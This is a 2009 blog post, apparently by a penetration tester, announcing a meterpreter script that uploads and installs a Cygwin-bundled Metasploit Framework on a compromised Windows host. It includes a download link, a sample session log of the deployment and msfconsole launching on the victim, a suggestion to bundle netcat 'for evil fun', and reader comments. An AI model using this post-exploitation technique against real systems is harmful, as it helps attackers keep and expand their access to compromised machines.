Metasploit Framework as a Payload
Friday, June 26, 2009 at 1:45AM Well, sorta…
I created a meterpreter script that takes the cygwin bundled version of Metasploit inside of a NullSoft installer that HD Moore created and deploys it using meterpreter to the compromised host, extracts/installs it, and runs the shell. Now I left this intentionally open so that you could package your own cygwin bundle (possibly with nmap and netcat), for your own evil fun.
Thanks defintely go to Carlos Perez (Dark0perator) and HD Moore for their help getting this bad boy working right.
You can download the script here: /scripts-and-programs/metasploit/deploymsf.rb
You can download the cygwin installs from the metasploit website:
13mb FULL framework: https://metasploit.com/framework-3.3-dev.exe
5mb MINI (just msfconsole): https://metasploit.com/mini-3.3-dev.exe
And here is what it looks like:
meterpreter > run deploymsf -f framework-3.3-dev.exe
[*] Running Meterpreter MSFp Deploytment Script.....
[*] Uploading MSFp for for deployment....
[*] MSFp uploaded as C:\DOCUME~1\mubix\LOCALS~1\Temp\12681.exe
[*] Installing MSFp...........
[*] Done!
[*] Installation Complete!
[*] Running cygwin shell channelized...
[*] Channel 18 created - Type: interact 18 to play
[*] Be warned, it takes a bit for post setup to happen
[*] and you will not see a prompt, try pwd to check
meterpreter > interact 18
Interacting with channel 18...
[*] Configuring multi-user permissions for first run...
[*] Configuring the initial user environment...
pwd
/home/mubix
ls
msfconsole
*** Metasploit only has EXPERIMENTAL support for Ruby 1.9.1 and newer, things may break!
*** Please report bugs to msfdev[at]metasploit.com
[-] ***
[-] * WARNING: No database support: LoadError no such file to load -- active_record
[-] ***
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
=[ msf v3.3-dev
+ -- --=[ 379 exploits - 231 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 156 aux
msf >GAME OVER
metasploit, meterpreter, script in Hacking
Reader Comments (4)
Good post; have shared with my team...
As Borat said...."Veddy Nice, Veddy nice"
Nice tool, Thanks.
Hi :D
I know this is bumping an AGE old post (almost two years now), but a situation has come up where this exact solution would be perfect.
But, I am slightly taken back by the fact that the 3.3-dev installer has been taken offline, and I am wondering how exactly you get a cygwin shell as a session in meterpreter. I have managed to install the latest metasploit framework (3.6), on a Windows host, but the issue is as soon as I try to start msfconsole, or any tool, it starts up in console.exe, in the GUI, which is fairly annoying.
Is there any way to start the latest metasploit within a cygwin shell in command prompt/a session in meterpreter.
Thank you very much for your help,
iVind